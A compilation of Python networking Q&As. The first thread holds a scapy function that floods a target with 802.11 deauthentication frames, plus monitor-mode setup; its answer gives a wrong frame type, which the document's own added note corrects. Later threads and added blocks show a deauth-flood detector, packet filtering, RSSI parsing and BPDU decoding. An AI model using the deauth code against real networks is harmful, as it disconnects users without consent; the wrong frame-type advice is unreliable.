Deauth attack with scapy in python - python-3.x

Hi, I'm coming to you because I'm currently coding a framework for LAN attacks to understand better how they work, and I want to add a deauth attack. Here is the code of the function, but it doesn't work and I do not understand what is wrong.

    def disconnect(self):
        target_mac = self.t_mac
        gw_mac = self.gw_mac  # gateway mac address
        dot11 = Dot11(type=0, addr1=target_mac, addr2=gw_mac, addr3=gw_mac)
        pkt = RadioTap()/dot11/Dot11Deauth(reason=7)
        scapy.sendp(pkt, inter=0.1, count=1000, verbose=0)

I am on Windows 10, and analyse the exchange with Wireshark.
The packet seems really weird in Wireshark.
Hope you can give me some information to help.
Thanks in advance guys ;)
[Screenshot: Packet Wireshark Dot11]

A Dot11 packet with type 8 and subtype 12 is a Dot11Deauth packet.
So, when you define dot11 try this:
    dot11 = Dot11(type=8, subtype=12, addr1=target_mac, addr2=gw_mac, addr3=gw_mac)

Also, try to put your interface in monitor mode and make sure to use a wireless interface (like wlan0, wlan1 and not eth0, which is Ethernet).
Run these commands in a shell:

    ifconfig <IFACE> down
    iwconfig <IFACE> mode monitor
    ifconfig <IFACE> up

where IFACE is the interface you want to use. Just run ifconfig to check which one is available.
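The defender's view of the same traffic, as an added example that is not part of the question or the answer: in the 802.11 frame-control field a deauthentication frame is management type 0 with subtype 12 (scapy's Dot11Deauth layer binds to Dot11 with type=0, subtype=12), and disassociation is subtype 10. The parser below decodes the MAC header of a raw 802.11 frame (RadioTap header already stripped) and a sliding-window counter flags a transmitter that sends many deauth/disassoc frames in a short time, which is the signature a wireless IDS looks for. The frames in SAMPLE_CAPTURE are constructed for the example, not real captures; the threshold and window values are arbitrary defaults.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame-control values for the management frames that force a disconnect.
MGMT_TYPE = 0
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

# A few IEEE 802.11 reason codes, to make alerts readable.
REASON_CODES = {1: "unspecified", 3: "STA leaving", 7: "class 3 frame from non-associated STA"}


def _mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_80211(frame):
    """Parse the 802.11 MAC header (plus the reason code of deauth/disassoc frames).
    `frame` is the bare 802.11 frame, without RadioTap. Returns None if too short."""
    if len(frame) < 24:
        return None
    fc0, _fc1, _duration = struct.unpack_from("<BBH", frame, 0)
    info = {
        "type": (fc0 >> 2) & 0x3,      # bits 2-3 of the first frame-control byte
        "subtype": (fc0 >> 4) & 0xF,   # bits 4-7
        "addr1": _mac(frame[4:10]),    # receiver / destination
        "addr2": _mac(frame[10:16]),   # transmitter / source
        "addr3": _mac(frame[16:22]),   # BSSID for management frames
    }
    if (info["type"] == MGMT_TYPE and info["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)
            and len(frame) >= 26):
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


class DeauthFloodDetector:
    """Alert once when a single transmitter sends >= threshold deauth/disassoc
    frames within window_s seconds (sliding window per transmitter)."""

    def __init__(self, threshold=10, window_s=5.0):
        self.threshold = threshold
        self.window_s = window_s
        self.seen = defaultdict(deque)   # addr2 -> timestamps of recent frames
        self.alerted = set()

    def feed(self, ts, frame):
        info = parse_80211(frame)
        if (not info or info["type"] != MGMT_TYPE
                or info["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)):
            return None
        q = self.seen[info["addr2"]]
        q.append(ts)
        while q and ts - q[0] > self.window_s:   # expire frames outside the window
            q.popleft()
        if len(q) >= self.threshold and info["addr2"] not in self.alerted:
            self.alerted.add(info["addr2"])
            reason = info.get("reason")
            return (f"deauth/disassoc flood: {len(q)} frames from {info['addr2']} "
                    f"to {info['addr1']} within {self.window_s}s, reason {reason} "
                    f"({REASON_CODES.get(reason, 'other')})")
        return None


# Constructed sample capture (not real traffic): twelve identical deauth frames
# 0.1 s apart from one transmitter, one beacon, and one lone deauth from another AP.
DEAUTH_HEX = "c0003a01" "112233445566" "aabbccddeeff" "aabbccddeeff" "1000" "0700"
BEACON_HEX = "80000000" "ffffffffffff" "aabbccddeeff" "aabbccddeeff" "2000"
OTHER_DEAUTH_HEX = "c0003a01" "112233445566" "021122334455" "021122334455" "3000" "0300"
SAMPLE_CAPTURE = [(0.1 * i, bytes.fromhex(DEAUTH_HEX)) for i in range(12)]
SAMPLE_CAPTURE += [(0.5, bytes.fromhex(BEACON_HEX)), (0.9, bytes.fromhex(OTHER_DEAUTH_HEX))]


def run_detector(capture, threshold=10, window_s=5.0):
    """Feed (timestamp, frame) pairs through the detector and collect alerts."""
    det = DeauthFloodDetector(threshold, window_s)
    return [alert for ts, fr in capture if (alert := det.feed(ts, fr))]


if __name__ == "__main__":
    for alert in run_detector(SAMPLE_CAPTURE):
        print(alert)
```

In a real deployment the frames come from a monitor-mode interface (for example via scapy's sniff with a callback that strips RadioTap and calls feed with the capture timestamp); the detector itself is independent of the capture library.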

Related

How to sniff pakages and discard?

I want to sniff some packets, and if the packet meets some conditions (e.g. dst ip = 'xxx'), I want to discard it. Something like a firewall.
I am trying to use scapy's sniff.
I expect to be able to stop the original packet from src A to dst B if the packet meets the condition.
You can't do that using Scapy.
You will need to use:
On Unix: use netfilterqueue alongside Scapy, similar to Modify with scapy and netfilterqueue
On Windows: your best bet is WinDivert (watch out: pydivert doesn't work with the latest version. You might want to fix it yourself :/)
In fact, Scapy only receives packets after they have gone through the OS. It won't be able to discard them. The software listed above uses tricks to catch them beforehand.

Can I intercept network packets with a raw socket (not only sniff)?

This is my first time using raw sockets (yes, I need to use them as I must modify a field inside a network header) and all the documentation or tutorials I read describe a solution to sniff packets, but that is not exactly what I need. I need to create a script which intercepts the packet, processes it and sends it on to the destination, i.e. the packets should not reach the destination unless my script decides so.
In order to learn, I created a small prototype which detects pings and just prints "PING". I would expect ping not to work as I intercept the packets and I don't include the logic to send them to their destination. However ping is working (again, it seems as if it is just sniffing/mirroring packets). My goal is that the ping packets are "trapped" in my script and I don't know how to do that. This is what I do in my current python script (I omit how I do the decoding for simplicity):

    import socket

    # ETH_P_ALL (0x0003): receive every protocol seen on the interface
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
    sock.bind(("eth0", 0))
    packet, _addr = sock.recvfrom(65565)  # recvfrom returns (bytes, address)
    decode_eth(packet)  # header decoders omitted in the question
    decode_ip(packet)
    if ipheader.ip_proto == 1:
        print("\nPING")
Can somebody explain how can I achieve my goal or point me to the right documentation?
Your description seems to be different from what your title suggests. My understanding is that you want to receive, modify and possibly drop incoming network packets, and this is to be done on Linux. In that case I suggest you use a netfilter PREROUTING hook, which will make things a lot simpler (and likely more stable). Netfilter is well documented; a nice overview including information related to your requirements can be seen here. The important function to use is nf_register_hook(); read the answer to this question to get an idea of how to set things up.
I suppose that your Linux box is configured as a router (not a bridge). The packet will pass through your Linux box because you have enabled IP forwarding. So there are two solutions:
Solution 1:
Disable IP Forwarding and then receive the packet from one interface and do the appropriate task (forwarding to another interface or dropping it).
Solution 2:
Use NetFilterQueue.
Install it on your Linux box (Debian/Ubuntu in my example):
    apt-get install build-essential python-dev libnetfilter-queue-dev

Use iptables to send packets coming from the input interface (eth0 in my example):

    iptables -I INPUT -i eth0 -j NFQUEUE --queue-num 1

Run this script to handle packets forwarded to queue No. 1:

    from netfilterqueue import NetfilterQueue

    def print_and_accept(pkt):
        print(pkt)
        pkt.accept()  # every packet needs a verdict: accept() or drop()

    nfqueue = NetfilterQueue()
    nfqueue.bind(1, print_and_accept)
    try:
        nfqueue.run()
    except KeyboardInterrupt:
        print()

Note that pkt.drop() causes the packet to be dropped. Also, you should accept/drop every packet.
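What goes inside that callback is the part both questions above leave open: how to decide, from the raw bytes, whether to accept or drop. Added example (not from either answer, and not the netfilterqueue project's code): an IPv4 header parser that verifies the header checksum, a small first-match rule list covering the "dst ip = 'xxx'" case from the sniff-and-discard question, and a callback with the shape NetfilterQueue.bind() expects (pkt.get_payload() returns the IP packet; pkt.accept()/pkt.drop() set the verdict). Malformed payloads are dropped rather than passed, so the filter fails closed. The packets, addresses and rules are constructed for the example; the netfilterqueue module itself is not imported, so the block runs offline.

```python
import ipaddress
import struct


def _checksum(data):
    """RFC 1071 one's-complement sum; a header carrying a correct checksum yields 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(payload):
    """Parse the IPv4 header of a raw IP packet (what pkt.get_payload() hands the
    callback). Returns None for anything that is not a well-formed IPv4 header."""
    if len(payload) < 20:
        return None
    (ver_ihl, _tos, total_len, _ident, _flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack_from("!BBHHHBBH4s4s", payload, 0)
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(payload) < ihl or _checksum(payload[:ihl]) != 0:
        return None
    info = {"src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
            "proto": proto, "ttl": ttl, "total_len": total_len}
    if proto in (6, 17) and len(payload) >= ihl + 4:   # TCP/UDP: ports follow the IP header
        info["sport"], info["dport"] = struct.unpack_from("!HH", payload, ihl)
    return info


# First matching rule wins; a rule matches when every field it lists equals the packet's.
RULES = [
    {"dst": "10.0.0.5", "verdict": "drop"},             # the question's "dst ip = 'xxx'" case
    {"proto": 1, "verdict": "drop"},                     # drop all ICMP
    {"proto": 6, "dport": 22, "verdict": "accept"},
]


def decide(info, rules=RULES, default="accept"):
    if info is None:
        return "drop"   # fail closed on malformed or non-IPv4 payloads
    for rule in rules:
        if all(info.get(k) == v for k, v in rule.items() if k != "verdict"):
            return rule["verdict"]
    return default


def nfqueue_callback(pkt, rules=RULES):
    """Callback for NetfilterQueue.bind(queue_num, callback): exactly one verdict per packet."""
    if decide(parse_ipv4(pkt.get_payload()), rules) == "drop":
        pkt.drop()
    else:
        pkt.accept()


def _build_ipv4(src, dst, proto, l4_payload):
    """Construct a sample IPv4 packet with a valid header checksum (test fixture only)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4_payload), 0x1234, 0x4000, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", _checksum(hdr)) + hdr[12:] + l4_payload


# Constructed sample packets, not real traffic.
SAMPLE_PACKETS = [
    _build_ipv4("192.168.1.10", "10.0.0.5", 17, struct.pack("!HH", 40000, 53) + bytes(4)),   # UDP to blocked host
    _build_ipv4("192.168.1.10", "10.0.0.9", 1, b"\x08\x00\xf7\xff\x00\x00\x00\x00"),          # ICMP echo request
    _build_ipv4("192.168.1.10", "10.0.0.9", 6, struct.pack("!HH", 51000, 22) + bytes(16)),   # TCP to port 22
    b"\x45\x00\x00\x14" + bytes(16),                                                          # header with bad checksum
]


def simulate(packets, rules=RULES):
    """Verdict for each raw packet, the same logic nfqueue_callback applies live."""
    return [decide(parse_ipv4(p), rules) for p in packets]


if __name__ == "__main__":
    for p, verdict in zip(SAMPLE_PACKETS, simulate(SAMPLE_PACKETS)):
        print(verdict, parse_ipv4(p))
```

With the iptables rule from the answer in place, `nfqueue.bind(1, nfqueue_callback)` plugs the same decision logic into the queue; dropping on parse failure matters because an unparseable packet that is silently accepted is a bypass.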

tcpdump catching mac and rssi in linux

I'm trying to use a wlan adapter (TP-link TL-WN722N) in monitor mode to pick up RSS from signals in the environment (both beacons and clients). What I would like to do is to get the MAC address and RSS value into my own code somehow (preferably python). I'm planning to use these values for a rough estimate of locations of nearby devices.
I've looked into scapy, but it does not seem to provide RSS values.
tcpdump seems to be able to get both values, but I have been unable to catch client devices.
Is it possible?
If so can I filter MAC and RSS somehow?
I got it working with tcpdump!
To setup a monitor mode adapter, you first need to check which interface to use:
    iw list

Select the correct phy (for me it's phy1) and create an adapter (I called it moni0):

    sudo iw phy phy1 interface add moni0 type monitor

Then add your adapter to the ifconfig:

    sudo ifconfig moni0 up

See this guide for more details.
I used the following params for tcpdump to get the values that I needed (you can pipe the output to your program, main.py in my case):

    sudo tcpdump -n -e -tttt -vvvv -i moni0 | python main.py
You can find my project here.
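The consuming side of that pipe, as an added example (not the answerer's main.py): it pulls the timestamp, the transmitter address (SA:) and the radiotap signal field (the "-NNdBm signal" token) out of each tcpdump line and keeps per-transmitter frame counts and mean RSSI, which is the input a coarse proximity estimate would use. Control frames such as ACKs carry only a receiver address and no SA, so they are skipped rather than misattributed. The lines in SAMPLE_LINES are constructed to approximate tcpdump's -e -vvvv output on a radiotap monitor interface; field order in real output may differ slightly, which is why the parser uses searches rather than fixed columns.

```python
import re
import sys
from collections import defaultdict

# Tokens we need from `tcpdump -n -e -tttt -vvvv -i moni0` on a radiotap monitor interface.
RSSI_RE = re.compile(r"(-?\d+)dBm signal")
MAC = r"([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})"
SA_RE = re.compile(r"\bSA:" + MAC)        # transmitter address
BSSID_RE = re.compile(r"\bBSSID:" + MAC)
TS_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)")   # -tttt timestamp


def parse_line(line):
    """Return (timestamp, transmitter_mac, bssid, rssi_dbm) or None.
    Lines without a signal field or without a transmitter address (ACK/CTS) are skipped."""
    rssi = RSSI_RE.search(line)
    sa = SA_RE.search(line)
    if not rssi or not sa:
        return None
    ts = TS_RE.match(line)
    bssid = BSSID_RE.search(line)
    return (ts.group(1) if ts else None,
            sa.group(1).lower(),
            bssid.group(1).lower() if bssid else None,
            int(rssi.group(1)))


class RssiTable:
    """Per-transmitter running statistics: frame count, last and mean RSSI, BSSID seen."""

    def __init__(self):
        self.stats = defaultdict(lambda: {"count": 0, "sum": 0, "last": None, "bssid": None})

    def update(self, parsed):
        _ts, mac, bssid, rssi = parsed
        s = self.stats[mac]
        s["count"] += 1
        s["sum"] += rssi
        s["last"] = rssi
        if bssid:
            s["bssid"] = bssid

    def mean(self, mac):
        s = self.stats[mac]
        return s["sum"] / s["count"] if s["count"] else None


def process(lines):
    """Feed an iterable of tcpdump lines (sys.stdin when piped) into an RssiTable."""
    table = RssiTable()
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            table.update(parsed)
    return table


# Constructed sample lines approximating tcpdump -e -vvvv radiotap output (not a real capture).
SAMPLE_LINES = [
    "2021-05-04 10:15:01.123456 1.0 Mb/s 2412 MHz 11b -41dBm signal antenna 0 "
    "BSSID:aa:bb:cc:dd:ee:ff DA:Broadcast SA:aa:bb:cc:dd:ee:ff Beacon (HomeNet) "
    "[1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 1, PRIVACY",
    "2021-05-04 10:15:01.200001 54.0 Mb/s 2412 MHz 11g -63dBm signal antenna 0 "
    "BSSID:aa:bb:cc:dd:ee:ff SA:11:22:33:44:55:66 DA:aa:bb:cc:dd:ee:ff Data IV:1a2b Pad 20 KeyID 0",
    "2021-05-04 10:15:01.200400 24.0 Mb/s 2412 MHz 11g -62dBm signal antenna 0 "
    "Acknowledgment RA:11:22:33:44:55:66",
    "2021-05-04 10:15:02.010000 54.0 Mb/s 2412 MHz 11g -65dBm signal antenna 0 "
    "BSSID:aa:bb:cc:dd:ee:ff SA:11:22:33:44:55:66 DA:aa:bb:cc:dd:ee:ff Data IV:1a2c Pad 20 KeyID 0",
    "2021-05-04 10:15:02.300000 1.0 Mb/s 2412 MHz 11b -41dBm signal antenna 0 "
    "BSSID:aa:bb:cc:dd:ee:ff DA:Broadcast SA:aa:bb:cc:dd:ee:ff Beacon (HomeNet) "
    "[1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 1, PRIVACY",
]


if __name__ == "__main__":
    source = SAMPLE_LINES if sys.stdin.isatty() else sys.stdin
    table = process(source)
    for mac, s in sorted(table.stats.items()):
        print(f"{mac}  frames={s['count']}  last={s['last']}dBm  "
              f"mean={table.mean(mac):.1f}dBm  bssid={s['bssid']}")
```

Run as the right-hand side of the pipe in the answer it reads stdin; run on its own it uses the constructed lines. The ACK line illustrates the failure mode to watch for: its RA: is the client, and attributing its RSSI to the client would mix the access point's transmit power into the client's estimate.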

measuring TX retransmission amount per interface

I'm trying to get the TX retransmission amount for a specific network interface on a Linux 2.6.33.3 kernel.
Is there any Linux raw data I can use in order to get/calculate this kind of information?
I've tried netstat, but I couldn't find a way to get the retransmissions value for a specific interface.
With no other "quick" choice, what would it require from me in order to build a small app especially for that? Listen to all outgoing packets using any capturing library and count... what? Duplicate packets? By some kind of packet id?
I'm not a network pro... am I supposed to find trouble in this kind of mission? (btw, I'll probably try to do it with python. Any reason why not to?)
You can check how your interface is configured with the following commands:
    mii-tool eth0
    ethtool eth0
    mii-diag eth0

Not all of them are installed by default in any Linux system, but they are definitely in the distribution and installable.
When you want to measure how fast your interface really is, you can use dd + netcat:

    host1$ cat /dev/zero | nc -l -p 3000
    host2$ nc host1 3000 | dd of=/dev/null
    ^C

dd will tell you at which speed the retransmission between host1 and host2 ran.
If you want it per interface, try ifconfig eth0; you probably have what you want there. Just parse it with python.
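Parsing that in Python is easier from the file ifconfig reads than from ifconfig's text, so here is an added example (not from the answer): it parses /proc/net/dev, whose transmit columns are the per-interface link-level counters (errors, drops, collisions, carrier losses), and /proc/net/snmp, whose Tcp line carries RetransSegs, the TCP retransmission counter netstat -s prints; that one is system-wide, not per interface, which is why netstat could not give a per-interface value. Two snapshots taken apart give a delta, which is how you measure a rate. The sample file contents are constructed for the example.

```python
RX_FIELDS = ["rx_bytes", "rx_packets", "rx_errs", "rx_drop", "rx_fifo", "rx_frame",
             "rx_compressed", "rx_multicast"]
TX_FIELDS = ["tx_bytes", "tx_packets", "tx_errs", "tx_drop", "tx_fifo", "tx_colls",
             "tx_carrier", "tx_compressed"]


def parse_proc_net_dev(text):
    """Per-interface counters from /proc/net/dev (the data ifconfig prints).
    TX columns are link-level: errors, drops, collisions and carrier losses."""
    result = {}
    for line in text.splitlines()[2:]:        # first two lines are column headers
        if ":" not in line:
            continue
        iface, rest = line.split(":", 1)
        values = [int(v) for v in rest.split()]
        if len(values) < 16:
            continue
        result[iface.strip()] = dict(zip(RX_FIELDS + TX_FIELDS, values[:16]))
    return result


def parse_proc_net_snmp(text, proto="Tcp"):
    """Counters from /proc/net/snmp: a names line and a values line share the prefix.
    Tcp RetransSegs is the system-wide TCP retransmission count netstat -s shows."""
    lines = [l for l in text.splitlines() if l.startswith(proto + ":")]
    if len(lines) < 2:
        return {}
    names = lines[0].split()[1:]
    values = [int(v) for v in lines[1].split()[1:]]
    return dict(zip(names, values))


def counter_delta(before, after, iface,
                  fields=("tx_packets", "tx_errs", "tx_drop", "tx_colls", "tx_carrier")):
    """Difference between two /proc/net/dev snapshots for one interface."""
    return {f: after[iface][f] - before[iface][f] for f in fields}


def tx_error_ratio(counters, iface):
    """Fraction of transmitted packets that hit an error, drop, collision or carrier loss."""
    c = counters[iface]
    bad = c["tx_errs"] + c["tx_drop"] + c["tx_colls"] + c["tx_carrier"]
    return bad / c["tx_packets"] if c["tx_packets"] else 0.0


# Constructed sample snapshots (not from a real machine), in /proc/net/dev layout.
SAMPLE_T0 = """Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
    lo:   123456     1000    0    0    0     0          0         0   123456     1000    0    0    0     0       0          0
  eth0: 98765432   765432    0   12    0     0          0       345 12345678   654321    3    0    0    17       2          0
"""
SAMPLE_T1 = """Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
    lo:   123456     1000    0    0    0     0          0         0   123456     1000    0    0    0     0       0          0
  eth0: 98865432   766032    0   12    0     0          0       350 12395678   654821    3    0    0    21       2          0
"""
SAMPLE_SNMP = """Tcp: RtoAlgorithm RtoMin RtoMax MaxConn ActiveOpens PassiveOpens AttemptFails EstabResets CurrEstab InSegs OutSegs RetransSegs InErrs OutRsts
Tcp: 1 200 120000 -1 123 456 7 8 9 10000 20000 42 0 5
"""


if __name__ == "__main__":
    try:
        with open("/proc/net/dev") as f:
            dev = parse_proc_net_dev(f.read())
        with open("/proc/net/snmp") as f:
            tcp = parse_proc_net_snmp(f.read())
    except OSError:                          # not on Linux: fall back to the constructed sample
        dev, tcp = parse_proc_net_dev(SAMPLE_T0), parse_proc_net_snmp(SAMPLE_SNMP)
    for iface, c in dev.items():
        print(f"{iface}: tx_packets={c['tx_packets']} tx_errs={c['tx_errs']} "
              f"tx_colls={c['tx_colls']} tx_carrier={c['tx_carrier']} "
              f"error_ratio={tx_error_ratio(dev, iface):.6f}")
    print("TCP RetransSegs (system-wide):", tcp.get("RetransSegs"))
```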

Sniffing 802.3 eth packets with socket raw

I'd need to sniff on an interface for BPDU (bridge protocol data unit) packets, which are encapsulated in Ethernet frames of type 802.3 with an LLC header. I tried to open a raw socket:

    from socket import socket, AF_PACKET, SOCK_RAW, htons
    skd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_802_3))  # ETH_P_802_3 is 0x0001 in if_ether.h

but trying to sniff packets I can't catch them. Looking at include/linux/if_ether.h, it seems that ETH_P_802_3 was a dummy type... is there a solution or should I use ETH_P_ALL and analyze the EtherType field of the Ethernet header?
Thank you all!
Sorry, I'm not sure if your question is regarding the ETH_P_ALL flag or if your sniffer simply doesn't work.
I would recommend using ETH_P_ALL and decoding the headers yourself.
If your sniffer's not working, make sure that you have promiscuous mode on. From the command line, you can use ifconfig eth0 promisc, assuming your Ethernet device is eth0. Or you can set the IFF_PROMISC flag on your device using ioctl.
All that said, unless you have a good reason not to, it's probably strongly worth your while to not reinvent the wheel and simply use libpcap.
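What "decode the headers yourself" amounts to for this question, as an added example that is not the answerer's code: bind to ETH_P_ALL, tell Ethernet II from 802.3 by the value after the source address (an EtherType is 0x0600 or above, an 802.3 length is at most 0x05DC), read the LLC header, and recognise a BPDU by the STP multicast destination 01:80:c2:00:00:00 with DSAP and SSAP 0x42, then decode the configuration BPDU fields. A monitoring check that flags a BPDU advertising an unexpected root bridge is included, since a new root appearing on an access port is what a switch administrator wants to know about. The sample frames are constructed; the live capture function opens an AF_PACKET socket (Linux, CAP_NET_RAW) but is not run by default.

```python
import socket
import struct

ETH_P_ALL = 0x0003                     # linux/if_ether.h: every protocol, as the answer recommends
STP_MULTICAST = "01:80:c2:00:00:00"    # destination of every 802.1D BPDU
LLC_SAP_BPDU = 0x42


def _mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_ethernet(frame):
    """Split a frame into Ethernet II (EtherType >= 0x0600) or IEEE 802.3
    (length field <= 0x05DC followed by a 3-byte LLC header)."""
    if len(frame) < 14:
        return None
    type_or_len = struct.unpack_from("!H", frame, 12)[0]
    info = {"dst": _mac(frame[:6]), "src": _mac(frame[6:12])}
    if type_or_len >= 0x0600:
        info.update(kind="ethernet_ii", ethertype=type_or_len, payload=frame[14:])
    else:
        if len(frame) < 17:
            return None
        info.update(kind="802.3", length=type_or_len,
                    llc={"dsap": frame[14], "ssap": frame[15], "control": frame[16]},
                    payload=frame[17:14 + type_or_len])
    return info


def _bridge_id(b):
    return {"priority": struct.unpack("!H", b[:2])[0], "mac": _mac(b[2:8])}


def parse_bpdu(payload):
    """Decode an 802.1D BPDU: a 4-byte TCN or a 35-byte configuration BPDU."""
    if len(payload) < 4:
        return None
    proto, version, bpdu_type = struct.unpack_from("!HBB", payload, 0)
    info = {"protocol_id": proto, "version": version, "type": bpdu_type}
    if bpdu_type == 0x80:                  # Topology Change Notification, no further fields
        return info
    if len(payload) < 35:
        return None
    flags, root_id, root_cost, bridge_id, port_id, age, max_age, hello, fwd = \
        struct.unpack_from("!B8sI8sHHHHH", payload, 4)
    info.update(flags=flags, root=_bridge_id(root_id), root_path_cost=root_cost,
                bridge=_bridge_id(bridge_id), port_id=port_id,
                message_age=age / 256, max_age=max_age / 256,     # timers are in 1/256 s
                hello_time=hello / 256, forward_delay=fwd / 256)
    return info


def extract_bpdu(frame):
    """Return the decoded BPDU (with the sending MAC) or None if the frame is not one."""
    eth = parse_ethernet(frame)
    if not eth or eth["kind"] != "802.3" or eth["dst"] != STP_MULTICAST:
        return None
    if eth["llc"]["dsap"] != LLC_SAP_BPDU or eth["llc"]["ssap"] != LLC_SAP_BPDU:
        return None
    bpdu = parse_bpdu(eth["payload"])
    if bpdu:
        bpdu["src"] = eth["src"]
    return bpdu


def root_claim_differs(bpdu, expected_root_mac):
    """Monitoring check: a configuration BPDU naming a root other than the one you expect."""
    return bool(bpdu) and bpdu.get("type") == 0 and bpdu["root"]["mac"] != expected_root_mac


def sniff_bpdus(iface, count=10):
    """Live capture on Linux: bind to ETH_P_ALL and decode everything ourselves."""
    sk = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    sk.bind((iface, 0))
    found = []
    while len(found) < count:
        bpdu = extract_bpdu(sk.recv(65535))
        if bpdu:
            found.append(bpdu)
    return found


# Constructed sample frames (not captured traffic).
BPDU_FRAME = bytes.fromhex(
    "0180c2000000" "001122334455" "0026"   # STP multicast dst, src, 802.3 length 38
    "424203"                               # LLC: DSAP 0x42, SSAP 0x42, UI control
    "0000" "00" "00" "00"                  # protocol id, version, type=config, flags
    "8000001122334455" "00000000"          # root id (priority 32768), root path cost
    "8000001122334455" "8001"              # bridge id, port id
    "0000" "1400" "0200" "0f00")           # msg age, max age 20 s, hello 2 s, fwd delay 15 s
IPV4_FRAME = bytes.fromhex("ffffffffffff" "001122334455" "0800") + bytes(20)

if __name__ == "__main__":
    print(extract_bpdu(BPDU_FRAME))
    print(parse_ethernet(IPV4_FRAME)["kind"], hex(parse_ethernet(IPV4_FRAME)["ethertype"]))
```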
